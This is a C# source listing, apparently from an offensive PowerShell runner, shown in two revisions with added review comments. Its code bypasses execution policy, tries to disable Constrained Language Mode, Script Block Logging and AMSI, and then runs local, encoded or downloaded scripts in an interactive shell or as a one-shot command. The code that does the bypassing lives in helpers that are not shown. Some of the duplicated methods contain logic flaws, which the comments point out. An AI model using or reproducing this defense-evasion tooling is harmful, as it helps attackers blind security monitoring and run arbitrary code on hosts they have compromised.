/// <summary>
/// Runs an optional script file followed by a single command in a fresh STA runspace and
/// returns the trimmed, concatenated output of both executions.
/// </summary>
/// <param name="scriptPath">Path of a script to dot-source first; an empty string skips this step.</param>
/// <param name="command">Command text handed to <c>ExecuteCommand</c> after the script.</param>
/// <returns>Combined output with surrounding whitespace removed (possibly empty).</returns>
private static string Execute(string scriptPath, string command)
{
    string output = "";
    CustomPSHost host = new CustomPSHost();
    var state = InitialSessionState.CreateDefault();
    state.ApartmentState = System.Threading.ApartmentState.STA;
    state.AuthorizationManager = null; // Bypasses PowerShell execution policy
    state.ThreadOptions = PSThreadOptions.UseCurrentThread;
    using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state))
    {
        runspace.ApartmentState = System.Threading.ApartmentState.STA;
        runspace.ThreadOptions = PSThreadOptions.UseCurrentThread;
        runspace.Open();
        using (var ps = PowerShell.Create())
        {
            ps.Runspace = runspace;
            if (!DisableDefenses(ps, host))
            {
                Info("[-] Could not disable all of the Powershell defenses.");
                if (!ProgramOptions.Force)
                {
                    // NOTE(review): this branch only logs. Unlike Parashell there is no
                    // return here, so the script and command still run without --force.
                    // Presumably unintended — confirm.
                    Info("[-] Bailing out...");
                }
            }
            string scriptContents = "";
            if (scriptPath.Length > 0)
            {
                scriptContents = GetFileContents(scriptPath);
                Info($"PS> . '{scriptPath}'");
                output += ExecuteCommand(scriptContents, ps, host, false, false, false);
                // Drop the in-memory copies of the script once it has been executed.
                scriptContents = "";
                scriptPath = "";
                ProgramOptions.ScriptPath = "";
            }
            // The fourth argument is the inverse of CmdEncoded; its meaning is defined in
            // ExecuteCommand, which is not on this page.
            output += ExecuteCommand(command, ps, host, !ProgramOptions.CmdEncoded);
            command = "";
            if (!ProgramOptions.Nocleanup && CleanupNeeded)
            {
                DisableClm.Cleanup(ps, host, ProgramOptions.Verbose);
            }
            // Explicit collection after the buffers above were cleared.
            System.GC.Collect();
        }
        runspace.Close();
    }
    return(output.Trim());
}
/// <summary>
/// Interactive read-eval-print loop over a single runspace: prints a prompt with the current
/// directory, executes each input line and stops on an empty line, "exit" or "quit".
/// </summary>
private static void Parashell()
{
    CustomPSHost host = new CustomPSHost();
    var state = InitialSessionState.CreateDefault();
    state.AuthorizationManager = null; // Bypasses PowerShell execution policy
    using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state))
    {
        runspace.Open();
        using (var ps = PowerShell.Create())
        {
            ps.Runspace = runspace;
            if (!DisableDefenses(ps, host))
            {
                Info("[-] Could not disable all of the Powershell defenses.");
                if (!ProgramOptions.Force)
                {
                    // Without --force the shell is not started at all.
                    Info("[-] Bailing out...");
                    return;
                }
            }
            string input;
            while (true)
            {
                // Resolve the working directory each iteration so the prompt tracks cd.
                string pwd = ExecuteCommand("(Resolve-Path .\\).Path", ps, host, true, true).Trim();
                string prompt = $"{GLOBAL_PROMPT_PREFIX} {pwd}> ";
                input = Input(prompt);
                // Note: the input is executed before the exit check, so "exit"/"quit"
                // (and an empty line) are passed to the runspace once before the loop ends.
                string output = ExecuteCommand(input, ps, host, true);
                Console.WriteLine(output);
                // NOTE(review): fixed keywords are compared culture-sensitively; an ordinal
                // comparison would be the usual choice for such literals.
                if (input == null || input.Length == 0 || String.Equals(input, "exit", StringComparison.CurrentCultureIgnoreCase) || String.Equals(input, "quit", StringComparison.CurrentCultureIgnoreCase))
                {
                    break;
                }
                input = "";
            }
            if (!ProgramOptions.Nocleanup && CleanupNeeded)
            {
                DisableClm.Cleanup(ps, host, ProgramOptions.Verbose);
            }
        }
        runspace.Close();
    }
}
/// <summary>
/// Attempts each of the three bypass steps in turn and logs the outcome of each.
/// A second definition of this method with the same signature appears later in this
/// listing; the two cannot coexist in one class, so this is presumably an earlier revision.
/// </summary>
/// <param name="rs">PowerShell instance bound to the target runspace.</param>
/// <param name="host">Host used by <c>ExecuteCommand</c> for output capture.</param>
/// <returns>true only if every step reported success.</returns>
private static bool DisableDefenses(PowerShell rs, CustomPSHost host)
{
    bool ret = true;
    // Here DoDisable is used as a bool; the later revision calls it with three arguments
    // as a statement — the helper's signature evidently changed between revisions.
    ret &= DisableClm.DoDisable(rs);
    string l = ExecuteCommand("$ExecutionContext.SessionState.LanguageMode", rs, host, true);
    Info($"[.] Language Mode: {l}");
    // The observed language mode is only logged; it is not folded into 'ret', so a
    // still-constrained session can still yield a true return if DoDisable said so.
    if (ret && String.Equals(l, "FullLanguage", StringComparison.CurrentCultureIgnoreCase))
    {
        Info("[+] Constrained Language Mode Disabled.");
    }
    else
    {
        Info("[-] Constrained Language Mode not disabled.");
    }
    if ((ret &= DisableScriptLogging(rs)))
    {
        Info("[+] Script Block Logging Disabled.");
    }
    else
    {
        Info("[-] Script Block Logging not disabled.");
    }
    if ((ret &= DisableAmsi(rs)))
    {
        Info("[+] AMSI Disabled.");
    }
    else
    {
        Info("[-] AMSI not disabled.");
    }
    return(ret);
}
/// <summary>
/// Entry point: parses options, then either starts the interactive shell or runs the
/// configured script/command once and prints its output.
/// </summary>
/// <param name="args">Command-line arguments; a leading --help, -h, /h or /? prints usage and exits.</param>
static void Main(string[] args)
{
    if ((args.Length >= 1) && (String.Equals(args[0], "--help", StringComparison.CurrentCultureIgnoreCase) || String.Equals(args[0], "/h", StringComparison.CurrentCultureIgnoreCase) || String.Equals(args[0], "/?", StringComparison.CurrentCultureIgnoreCase) || String.Equals(args[0], "-h", StringComparison.CurrentCultureIgnoreCase)))
    {
        Usage();
        return;
    }
    try
    {
        ProgramOptions = ParseOptions(args);
    }
    catch (ArgumentException e)
    {
        // e.Message is already a string; the ToString() call is redundant.
        Console.WriteLine($"[-] Cannot parse arguments: {e.Message.ToString()}");
        Usage();
        return;
    }
    if (ProgramOptions.Verbose)
    {
        PrintBanner();
    }
    if (ProgramOptions.ScriptPath.Length > 0)
    {
        Info($"[.] Will load script file: '{ProgramOptions.ScriptPath}'");
    }
    else
    {
        //Info($"[-] It looks like no script path was given.");
    }
    if (ProgramOptions.XorKey != 0)
    {
        Info($"[.] Using decoding key: {ProgramOptions.XorKey}");
    }
    try
    {
        // NOTE(review): 'dom' is never used or unloaded and nothing is executed inside it,
        // so this call provides no isolation — confirm whether it is still needed.
        AppDomain dom = AppDomain.CreateDomain("sandbox");
        if (ProgramOptions.Parashell)
        {
            // Swallow Ctrl+C so the interactive loop survives instead of the process exiting.
            Console.CancelKeyPress += (object sender, ConsoleCancelEventArgs e) =>
            {
                if (e.SpecialKey == ConsoleSpecialKey.ControlC)
                {
                    e.Cancel = true;
                    Console.WriteLine("^C");
                }
            };
            Parashell();
        }
        else
        {
            string output = Execute(ProgramOptions.ScriptPath, ProgramOptions.Command);
            if (output.Length > 0)
            {
                Console.WriteLine("\n" + output);
            }
        }
        GC.Collect();
        GC.WaitForPendingFinalizers();
        GC.Collect();
        // Final cleanup pass runs without a runspace (null ps/host), after the one
        // inside Execute/Parashell.
        if (!ProgramOptions.Nocleanup && CleanupNeeded)
        {
            DisableClm.Cleanup(null, null, ProgramOptions.Verbose);
        }
    }
    catch (Exception e)
    {
        // Catch-all: any unhandled failure is printed rather than crashing the process.
        Console.WriteLine($"[!] That's embarassing. Unhandled exception occured:\n{e}");
    }
}
/// <summary>
/// Runs an optional script (local file or http/https URL) followed by a single command in a
/// fresh STA runspace and returns the trimmed, concatenated output. Later revision of the
/// <c>Execute</c> defined earlier in this listing (same signature; the two cannot coexist).
/// </summary>
/// <param name="scriptPath">Local path or URL of a script to run first; an empty string skips this step.</param>
/// <param name="command">Command text handed to <c>ExecuteCommand</c> after the script.</param>
/// <returns>Combined output with surrounding whitespace removed (possibly empty).</returns>
private static string Execute(string scriptPath, string command)
{
    string output = "";
    CustomPSHost host = new CustomPSHost();
    var state = InitialSessionState.CreateDefault();
    state.ApartmentState = System.Threading.ApartmentState.STA;
    state.AuthorizationManager = null; // Bypasses PowerShell execution policy
    state.ThreadOptions = PSThreadOptions.UseCurrentThread;
    using (Runspace runspace = RunspaceFactory.CreateRunspace(host, state))
    {
        runspace.ApartmentState = System.Threading.ApartmentState.STA;
        runspace.ThreadOptions = PSThreadOptions.UseCurrentThread;
        runspace.Open();
        using (var ps = PowerShell.Create())
        {
            ps.Runspace = runspace;
            if (!DisableDefenses(ps, host))
            {
                Info("[-] Could not disable all of the Powershell defenses.");
                if (!ProgramOptions.Force)
                {
                    // NOTE(review): this branch only logs. Unlike Parashell there is no
                    // return here, so the script and command still run without --force.
                    // Presumably unintended — confirm.
                    Info("[-] Bailing out...");
                }
            }
            if (scriptPath.Length > 0)
            {
                bool success = true;
                string scriptContents = "";
                bool silent = false;
                try
                {
                    // NOTE(review): culture-sensitive prefix check; an Ordinal comparison is
                    // the usual choice for scheme literals.
                    if (scriptPath.StartsWith("http://") || scriptPath.StartsWith("https://"))
                    {
                        // Whatever the server returns is executed as-is below: there is no
                        // hash, signature or other integrity check on the downloaded text,
                        // and over plain http:// the content can be altered in transit.
                        // System.Net.WebClient is also deprecated in current .NET.
                        using (var wc = new System.Net.WebClient())
                        {
                            scriptContents = wc.DownloadString(scriptPath);
                        }
                        // 'silent' presumably suppresses echoing for downloaded scripts;
                        // its exact effect is defined in ExecuteCommand — confirm.
                        silent = true;
                        Info($"Executing downloaded script file: {scriptPath}");
                    }
                    else
                    {
                        if (!File.Exists(scriptPath))
                        {
                            // NOTE(review): a FileNotFoundException would be the specific type here.
                            throw new Exception($"Script file does not exist.Will not load it: '{scriptPath}'");
                        }
                        scriptContents = GetFileContents(scriptPath);
                        Info($"PS> . '{scriptPath}'");
                    }
                }
                catch (Exception e)
                {
                    // Any fetch/read failure is reported and the script step is skipped;
                    // the command below still runs.
                    Info($"Could not fetch script file/URL contents. Exception: {e}");
                    success = false;
                }
                if (success && scriptContents.Length > 0)
                {
                    output += ExecuteCommand(scriptContents, ps, host, false, silent, false);
                }
                // Drop the in-memory copies of the script once it has been executed.
                scriptContents = "";
                scriptPath = "";
                ProgramOptions.ScriptPath = "";
            }
            output += ExecuteCommand(command, ps, host, !ProgramOptions.CmdEncoded);
            command = "";
            if (!ProgramOptions.Nocleanup && CleanupNeeded)
            {
                DisableClm.Cleanup(ps, host, ProgramOptions.Verbose);
            }
            // Explicit collection after the buffers above were cleared.
            System.GC.Collect();
        }
        runspace.Close();
    }
    return(output.Trim());
}
/// <summary>
/// Reads the runspace's PowerShell version and language mode, then attempts each bypass
/// step in turn, logging the outcome of every step. Later revision of the
/// <c>DisableDefenses</c> defined earlier in this listing (same signature; the two cannot coexist).
/// </summary>
/// <param name="rs">PowerShell instance bound to the target runspace.</param>
/// <param name="host">Host used by <c>ExecuteCommand</c> for output capture.</param>
/// <returns>
/// true only if every attempted step reported success. A version below 5 returns true
/// without attempting anything unless --force is set.
/// </returns>
private static bool DisableDefenses(PowerShell rs, CustomPSHost host)
{
    bool ret = true;
    string l = ExecuteCommand("'{0}.{1}' -f $PSVersionTable.PSVersion.Major, $PSVersionTable.PSVersion.Minor", rs, host, true, true).Trim();
    // Default assumed when the version string cannot be parsed.
    float psversion = 5;
    try
    {
        // NOTE(review): the thread culture is replaced here and never restored. Since Parse
        // below is given InvariantCulture explicitly, this mutation looks redundant — confirm.
        System.Globalization.CultureInfo customCulture = (System.Globalization.CultureInfo)System.Threading.Thread.CurrentThread.CurrentCulture.Clone();
        customCulture.NumberFormat.NumberDecimalSeparator = ".";
        System.Threading.Thread.CurrentThread.CurrentCulture = customCulture;
        // "Major.Minor" parsed as a float: a two-digit minor (e.g. "7.10" -> 7.1) orders
        // below "7.2", so the value is only reliable for the "< 5" test below.
        psversion = float.Parse(l, System.Globalization.CultureInfo.InvariantCulture);
    }
    catch (FormatException e)
    {
        // Only FormatException is handled; OverflowException from Parse would propagate.
        Info($"[-] Could not obtain Powershell's version. Assuming 5.0 (exception: {e}");
    }
    if (psversion < 5.0 && !ProgramOptions.Force)
    {
        Info("[+] Powershell version is below 5, so AMSI, CLM, SBL are not available anyway :-)");
        Info("Skipping bypass procedures...");
        return(ret);
    }
    else
    {
        Info($"[.] Powershell's version: {psversion}");
    }
    l = ExecuteCommand("$ExecutionContext.SessionState.LanguageMode", rs, host, true, true).Trim();
    Info($"[.] Language Mode: {l}");
    if (!String.Equals(l, "FullLanguage", StringComparison.CurrentCultureIgnoreCase))
    {
        DisableClm.DoDisable(rs, host, ProgramOptions.Verbose);
        // Mark that the CLM step touched state which the Cleanup calls must later undo.
        CleanupNeeded = true;
        // Re-query rather than trusting DoDisable: success is judged by the observed mode.
        l = ExecuteCommand("$ExecutionContext.SessionState.LanguageMode", rs, host, true, true).Trim();
        Info($"[.] Language Mode after attempting to disable CLM: {l}");
        if (String.Equals(l, "FullLanguage", StringComparison.CurrentCultureIgnoreCase))
        {
            Info("[+] Constrained Language Mode Disabled.");
            // No-op: 'ret' is unchanged by &= true.
            ret &= true;
        }
        else
        {
            Info("[-] Constrained Language Mode not disabled.");
            ret &= false;
        }
    }
    else
    {
        Info("[+] No need to disable Constrained Language Mode. 
Already in FullLanguage.");
    }
    if ((ret &= DisableScriptLogging(rs)))
    {
        Info("[+] Script Block Logging Disabled.");
    }
    else
    {
        Info("[-] Script Block Logging not disabled.");
    }
    if ((ret &= DisableAmsi(rs)))
    {
        Info("[+] AMSI Disabled.");
    }
    else
    {
        Info("[-] AMSI not disabled.");
    }
    Info("");
    return(ret);
}